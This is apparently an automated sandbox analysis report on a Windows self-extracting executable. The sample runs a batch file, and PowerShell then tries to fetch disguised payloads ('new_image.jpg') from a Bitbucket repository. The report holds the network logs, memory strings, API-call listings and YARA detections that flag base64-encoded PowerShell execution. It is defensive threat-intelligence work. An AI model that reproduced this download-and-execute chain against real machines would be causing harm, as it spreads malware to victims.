        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbD source: powershell.exe, 00000005.00000002.1293487049.00000271497C0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.1294975015.00000271498EB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.1294975015.00000271498EB000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\nTHivMbGpg.exeCode function: 0_2_00007FF6FD212034 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF6FD212034
        Source: global trafficHTTP traffic detected: GET /hgdfhdfgd/test/downloads/new_image.jpg?14441723 HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /hgdfhdfgd/test/downloads/new_image2.jpg?14461721 HTTP/1.1Host: bitbucket.org
        Source: Joe Sandbox ViewIP Address: 185.166.143.50 185.166.143.50
        Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49700 -> 185.166.143.50:443
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /hgdfhdfgd/test/downloads/new_image.jpg?14441723 HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /hgdfhdfgd/test/downloads/new_image2.jpg?14461721 HTTP/1.1Host: bitbucket.org
        Source: global trafficDNS traffic detected: DNS query: bitbucket.org
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 02 Oct 2024 17:02:43 GMTContent-Type: text/html; charset=utf-8Content-Length: 15020Server: AtlassianEdgeVary: authorization, cookie, user-context, Accept-Language, Origin, Accept-EncodingX-Used-Mesh: FalseContent-Language: enX-View-Name: bitbucket.apps.downloads.views.download_fileEtag: "b693a90a4b9b7ba5606827020189b49f"X-Dc-Location: Micros-3X-Served-By: 3c4d22791762X-Version: 3ff600212c86X-Static-Version: 3ff600212c86X-Request-Count: 394X-Render-Time: 0.08880853652954102X-B3-Traceid: 7002740a6d0144de9b07c02da296923cX-B3-Spanid: ab147ab00f9b85bbX-Frame-Options: SAMEORIGINContent-Security-Policy: connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; object-src 'none'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 02 Oct 2024 17:02:44 GMTContent-Type: text/html; charset=utf-8Content-Length: 15023Server: AtlassianEdgeVary: authorization, cookie, user-context, Accept-Language, Origin, Accept-EncodingX-Used-Mesh: FalseContent-Language: enX-View-Name: bitbucket.apps.downloads.views.download_fileEtag: "dcf3f17fb20258bb578342014cdbd4f0"X-Dc-Location: Micros-3X-Served-By: b49e06def07eX-Version: 3ff600212c86X-Static-Version: 3ff600212c86X-Request-Count: 154X-Render-Time: 0.08371186256408691X-B3-Traceid: 6e135e3382124723921a6252805b581aX-B3-Spanid: b2a3d0ff1cd02587X-Frame-Options: SAMEORIGINContent-Security-Policy: connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; object-src 'none'; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ 'nonce-ZOMOKYiM3v4/MCwtRSec2w=='; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132CC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bitbucket.org
        Source: powershell.exe, 00000004.00000002.1303077522.0000017DBB3E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
        Source: powershell.exe, 00000005.00000002.1290480289.00000271417A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027133078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1290480289.0000027141660000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132DAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000004.00000002.1303662906.0000017DBCDD4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.00000271315F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132DAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132DAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132CE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://admin.atlassian.com
        Source: powershell.exe, 00000004.00000002.1303662906.0000017DBCD5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1303662906.0000017DBCDAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.00000271315F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.bitbucket.org
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132CC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132CC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/css/entry/ad
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/css/entry/ap
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/css/entry/ve
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/dist/webpac
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/dist/webpack
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/dist/webpacp
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/img/default_
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/img/logos/bi
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132CE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/jsi18n/en/dj
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132CC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132CC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132CE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/blog/announcing-our-new-ci-cd-runtime-with-up-to-8x-faster-builds
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132CE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/blog/wp-json/wp/v2/posts?categories=196&context=embed&per_page=6&orderby=date&
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132CE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/gateway/api/emoji/
        Source: powershell.exe, 00000004.00000002.1303662906.0000017DBD2DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273729382.0000027131125000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1293487049.000002714973F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1294975015.0000027149945000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1272995587.000002712F640000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273126244.000002712F6E2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027131825000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273126244.000002712F712000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273126244.000002712F77A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.00000271315F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1272995587.000002712F645000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132DA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273126244.000002712F6EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723
        Source: powershell.exe, 00000004.00000002.1303662906.0000017DBD2DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273729382.0000027131125000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1293487049.000002714973F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1294975015.0000027149945000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1272995587.000002712F640000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273126244.000002712F6E2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027131825000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273126244.000002712F712000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273126244.000002712F77A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.00000271315F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1272995587.000002712F645000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132DA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273126244.000002712F6EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132CE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.status.atlassian.com/
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bqlf8qjztdtr.statuspage.io
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132CC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
        Source: powershell.exe, 00000005.00000002.1290480289.0000027141660000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000005.00000002.1290480289.0000027141660000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000005.00000002.1290480289.0000027141660000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132DAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://id.atlassian.com/login
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://id.atlassian.com/login?prompt=login&amp;continue=https%3A%2F%2Fbitbucket.org%2Fhgdfhdfgd%2Ft
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://id.atlassian.com/logout
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://id.atlassian.com/manage-profile/
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://id.atlassian.com/profile/rest/profile&quot;
        Source: powershell.exe, 00000005.00000002.1290480289.00000271417A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027133078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1290480289.0000027141660000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132DAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132DAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132CE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://preferences.atlassian.com
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132CC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132CC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132CC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.atlassian.com/try/cloud/signup?bundle=bitbucket
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
        Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
        Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
        Source: unknownHTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.7:49699 version: TLS 1.2

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: Process Memory Space: powershell.exe PID: 3724, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 2412, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: C:\Users\user\Desktop\nTHivMbGpg.exeCode function: 0_2_00007FF6FD212D70 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF6FD212D70
        Source: C:\Users\user\Desktop\nTHivMbGpg.exeCode function: 0_2_00007FF6FD211BF4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,0_2_00007FF6FD211BF4
        Source: C:\Users\user\Desktop\nTHivMbGpg.exeCode function: 0_2_00007FF6FD2141B40_2_00007FF6FD2141B4
        Source: C:\Users\user\Desktop\nTHivMbGpg.exeCode function: 0_2_00007FF6FD215F800_2_00007FF6FD215F80
        Source: C:\Users\user\Desktop\nTHivMbGpg.exeCode function: 0_2_00007FF6FD2168F00_2_00007FF6FD2168F0
        Source: C:\Users\user\Desktop\nTHivMbGpg.exeCode function: 0_2_00007FF6FD212EDC0_2_00007FF6FD212EDC
        Source: C:\Users\user\Desktop\nTHivMbGpg.exeCode function: 0_2_00007FF6FD211D100_2_00007FF6FD211D10
        Source: C:\Users\user\Desktop\nTHivMbGpg.exeCode function: 0_2_00007FF6FD216F140_2_00007FF6FD216F14
        Source: C:\Users\user\Desktop\nTHivMbGpg.exeCode function: 0_2_00007FF6FD21366E0_2_00007FF6FD21366E
        Source: C:\Users\user\Desktop\nTHivMbGpg.exeCode function: 0_2_00007FF6FD215F7E0_2_00007FF6FD215F7E
        Source: C:\Users\user\Desktop\nTHivMbGpg.exeCode function: 0_2_00007FF6FD211BF40_2_00007FF6FD211BF4
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFAACB425FD5_2_00007FFAACB425FD
        Source: nTHivMbGpg.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 3604 bytes, 1 file, at 0x2c +A "124.bat", ID 508, number 1, 1 datablock, 0x1503 compression
        Source: nTHivMbGpg.exeBinary or memory string: OriginalFilename vs nTHivMbGpg.exe
        Source: nTHivMbGpg.exe, 00000000.00000000.1212198360.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs nTHivMbGpg.exe
        Source: nTHivMbGpg.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs nTHivMbGpg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 4423
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 4423Jump to behavior
        Source: Process Memory Space: powershell.exe PID: 3724, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 2412, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engineClassification label: mal100.spre.evad.winEXE@9/6@1/1
        Source: C:\Users\user\Desktop\nTHivMbGpg.exeCode function: 0_2_00007FF6FD214838 CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA,0_2_00007FF6FD214838
        Source: C:\Users\user\Desktop\nTHivMbGpg.exeCode function: 0_2_00007FF6FD211BF4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,0_2_00007FF6FD211BF4
        Source: C:\Users\user\Desktop\nTHivMbGpg.exeCode function: 0_2_00007FF6FD2168F0 LocalAlloc,LocalFree,lstrcmpA,LocalFree,GetTempPathA,GetDriveTypeA,GetFileAttributesA,GetDiskFreeSpaceA,MulDiv,GetWindowsDirectoryA,GetFileAttributesA,CreateDirectoryA,SetFileAttributesA,GetWindowsDirectoryA,0_2_00007FF6FD2168F0
        Source: C:\Users\user\Desktop\nTHivMbGpg.exeCode function: 0_2_00007FF6FD215F80 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,#20,#22,#23,FreeResource,SendMessageA,0_2_00007FF6FD215F80
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7104:120:WilError_03
        Source: C:\Users\user\Desktop\nTHivMbGpg.exeFile created: C:\Users\user~1\AppData\Local\Temp\IXP000.TMPJump to behavior
        Source: C:\Users\user\Desktop\nTHivMbGpg.exeProcess created: C:\Windows\System32\cmd.exe cmd /c 124.bat
        Source: nTHivMbGpg.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\nTHivMbGpg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
